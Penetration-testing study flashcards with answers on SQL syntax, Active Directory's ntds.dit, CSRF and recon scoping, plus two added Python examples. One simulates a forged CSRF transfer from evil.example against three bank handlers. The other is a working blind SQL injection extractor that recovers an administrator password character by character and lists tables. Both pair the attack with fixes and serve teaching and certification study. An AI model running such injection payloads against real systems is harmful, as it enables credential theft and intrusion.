You have gained access to a database server during a penetration test and want to select the username and password of the administrators account in the "Users" table. Which of the following SQL statements would accomplish this task? 1. where username = 'administrator, select username, password from Users 2. select username, password where username = 'administrator' from Users; 3. select from Users, username password where username = 'administrator'; 4. select username, password from Users where username = 'administrator';

4. select username, password from Users where username = 'administrator'; Explanation) A SELECT lists the columns first, then the table in FROM, then the filter in WHERE. The other options place the clauses out of order and are syntax errors.

Where are the password representations stored by default on Active Directory domain controllers? 1. %Windows%\ntim\ntim.dat 2. HKEY_LOCAL_USER\Software\Microsoft\Windows 3. C:\Program Files\Windows NT\ 4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 5. %systemroot%\ntds\ntds.dit

5. %systemroot%\ntds\ntds.dit. Explanation) ntds.dit is the main Active Directory database (NTDS stands for NT Directory Services, DIT for Directory Information Tree). The ntds.dit file on a particular domain controller contains all naming contexts hosted by that domain controller, including the Configuration and Schema naming contexts; a Global Catalog server stores the partial naming context replicas in ntds.dit right along with the full naming context for its domain. The password hashes inside it are encrypted with a key derived from the SYSTEM registry hive, so a tester who copies ntds.dit needs the SYSTEM hive as well to extract them.

Which of the following describes Cross Site Request Forgery (XSRF)? 1. Advanced embedded JavaScript is used to turn a victim's web browser into a public proxy server. 2. Embedded JavaScript causes a victim's browser to request sensitive information. 3. Malicious HTML tricks a web browser into injecting HTML into a third-party site. 4. Injected HTML content causes a victim's browser to invoke functionality on a target web site.

4. Injected HTML content causes a victim's browser to invoke functionality on a target web site. Explanation) The XSRF attack vector involves an attacker injecting content that includes specially crafted HTML elements (no browser scripting is required) into a third-party web site. When an unsuspecting victim views the content the attacker posted there, it makes the victim's browser access a site on which the victim has an account, for example an e-commerce site, and carry out a transaction as the victim, because the browser attaches the victim's session cookies automatically.
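
The two XSRF cards (the description above and the defenses card earlier) as an added example; this is not code from the original study set. A hypothetical bank site (bank.example) is modelled as three request handlers sharing an in-memory session store: one that trusts the session cookie alone, one that adds the "static POST variable" from the defenses card, and one that checks a per-session unpredictable token and the Origin header. The forged request is what the victim's browser sends when it renders the attacker's auto-submitting form: the bank's cookie rides along automatically, the static token is public knowledge, but the per-session token is unknown to the attacker. All names, origins and balances are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple

SITE_ORIGIN = "https://bank.example"      # hypothetical target site
STATIC_TOKEN = "form-v2"                   # a "static POST variable": the same for every user

# Constructed in-memory server state (not from the page).
SESSIONS: Dict[str, Dict[str, str]] = {}
BALANCES: Dict[str, int] = {}


@dataclass
class Request:
    method: str
    cookies: Dict[str, str]
    form: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)


def login(user: str) -> str:
    """Issue a session cookie and a random per-session anti-CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def _transfer(user: str, to: str, amount: int) -> None:
    BALANCES[user] -= amount
    BALANCES[to] = BALANCES.get(to, 0) + amount


def transfer_vulnerable(req: Request) -> str:
    """Trusts the session cookie alone. The victim's browser attaches that cookie to a
    request the attacker's HTML triggered, so the forgery succeeds."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if not sess:
        return "401 not logged in"
    _transfer(sess["user"], req.form["to"], int(req.form["amount"]))
    return "200 ok"


def transfer_static_token(req: Request) -> str:
    """Adds a fixed POST variable. Useless: the attacker reads the constant from the
    public form and embeds it in the forged request."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if not sess:
        return "401 not logged in"
    if req.form.get("token") != STATIC_TOKEN:
        return "403 bad token"
    _transfer(sess["user"], req.form["to"], int(req.form["amount"]))
    return "200 ok"


def transfer_protected(req: Request) -> str:
    """Per-session unpredictable token (constant-time compare) plus an Origin check, both
    evaluated before any state changes. The forged request cannot carry the token because
    the same-origin policy keeps the attacker's page from reading the victim's bank page."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if not sess:
        return "401 not logged in"
    if req.method != "POST":
        return "405 state changes require POST"
    origin = req.headers.get("Origin", "")
    if origin and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    if not hmac.compare_digest(req.form.get("csrf", ""), sess["csrf"]):
        return "403 missing or wrong csrf token"
    _transfer(sess["user"], req.form["to"], int(req.form["amount"]))
    return "200 ok"


def forged_request(victim_sid: str) -> Request:
    """The victim's browser submitting the attacker's injected form: bank cookie attached,
    public static token included, per-session token absent, Origin = attacker's site."""
    return Request("POST", {"sid": victim_sid},
                   {"to": "attacker", "amount": "500", "token": STATIC_TOKEN},
                   {"Origin": "https://evil.example"})


def legitimate_request(sid: str) -> Request:
    """The same transfer submitted from the bank's own page, which embeds the session token."""
    return Request("POST", {"sid": sid},
                   {"to": "alice", "amount": "500", "csrf": SESSIONS[sid]["csrf"], "token": STATIC_TOKEN},
                   {"Origin": SITE_ORIGIN})


def simulate(handler: Callable[[Request], str], build_request: Callable[[str], Request]) -> Tuple[str, int]:
    """Fresh victim session with 1000 in the account, one request through `handler`;
    returns (response, victim balance afterwards)."""
    SESSIONS.clear()
    BALANCES.clear()
    BALANCES["victim"] = 1000
    sid = login("victim")
    return handler(build_request(sid)), BALANCES["victim"]


if __name__ == "__main__":
    for h in (transfer_vulnerable, transfer_static_token, transfer_protected):
        print(h.__name__, simulate(h, forged_request))
    print("legitimate", simulate(transfer_protected, legitimate_request))
```

The Origin check is a second line of defense, not a replacement for the token: some clients omit the header, which is why the code only rejects a present, mismatched Origin and still requires the token.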

What is the benefit of having a cheat sheet reference of database system tables when performing SQL Injection?

These tables contain metadata (table names, column names and types) that can be queried to gain additional helpful information once an injection point is found, for example information_schema.tables and information_schema.columns on MySQL, PostgreSQL and SQL Server, or sqlite_master on SQLite. Knowing the exact names lets the tester target the interesting data directly instead of guessing.
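
The SQL injection cards above (the substring function, querying database metadata, and the system-table cheat sheet) as one added, runnable example; this is not code from the original study set. A constructed SQLite database stands in for the target's Users table, a hypothetical application function concatenates input into its query and reveals only whether a row matched, and the attacker side recovers the administrator's password one character at a time with substr() and a binary search, then walks sqlite_master (SQLite's equivalent of information_schema) to list the tables. The parameterized version of the lookup is shown alongside as the fix.

```python
import sqlite3
from typing import List


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the target database (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE Orders (id INTEGER PRIMARY KEY, user_id INTEGER, total REAL);
        INSERT INTO Users (username, password) VALUES ('administrator', 'S3cr3t!');
        INSERT INTO Users (username, password) VALUES ('alice', 'hunter2');
    """)
    return db


def vulnerable_lookup(db: sqlite3.Connection, username: str) -> bool:
    """Hypothetical application code: concatenates user input into SQL (the flaw) and
    reveals only whether a matching row exists, so the tester works blind."""
    sql = f"SELECT id FROM Users WHERE username = '{username}'"
    return db.execute(sql).fetchone() is not None


def safe_lookup(db: sqlite3.Connection, username: str) -> bool:
    """The fix: a bound parameter is never parsed as SQL, so the payloads below are just
    an odd username that matches nobody."""
    return db.execute("SELECT id FROM Users WHERE username = ?", (username,)).fetchone() is not None


def ask(db: sqlite3.Connection, subquery: str, pos: int, threshold: int) -> bool:
    """One yes/no probe: is the code point of character `pos` of the subquery's result
    greater than `threshold`? The leading quote closes the literal, OR makes the whole
    WHERE depend on our condition, and -- comments out the application's closing quote."""
    payload = f"' OR unicode(substr(({subquery}), {pos}, 1)) > {threshold} --"
    return vulnerable_lookup(db, payload)


def extract_string(db: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover a string character by character with a binary search over ASCII (7 probes
    per character). Past the end, substr() yields '' whose unicode() is NULL, every probe
    is false, the search bottoms out at 0 and the loop stops."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(db, subquery, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out.append(chr(lo))
    return "".join(out)


def extract_password(db: sqlite3.Connection, user: str) -> str:
    return extract_string(db, f"SELECT password FROM Users WHERE username = '{user}'")


def extract_tables(db: sqlite3.Connection) -> List[str]:
    """Metadata walk: sqlite_master plays the role of information_schema.tables; ORDER BY
    with LIMIT 1 OFFSET n pulls one table name per extraction until none are left."""
    names = []
    for n in range(32):
        name = extract_string(
            db, f"SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name LIMIT 1 OFFSET {n}")
        if not name:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    db = build_db()
    print(extract_tables(db))                      # which tables exist
    print(extract_password(db, "administrator"))   # then the value we actually want
    print(safe_lookup(db, "' OR 1=1 --"))          # the same trick against the fixed code
```

Against a real target the same probes go into the vulnerable parameter of an HTTP request, and the yes/no signal is whatever the application leaks (a different page, a status code, or response time); only the transport changes, not the extraction logic.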

The scope of your engagement includes a target organization located in California with a /24 block of addresses that they claim to own outright. Which site could you use to confirm that you have been given accurate information before starting reconnaissance activities?

www.arin.net. Explanation) ARIN's Whois shows which organization the /24 is actually registered to before you send a single packet; addresses that turn out to belong to someone else are out of scope, and scanning them could be illegal.
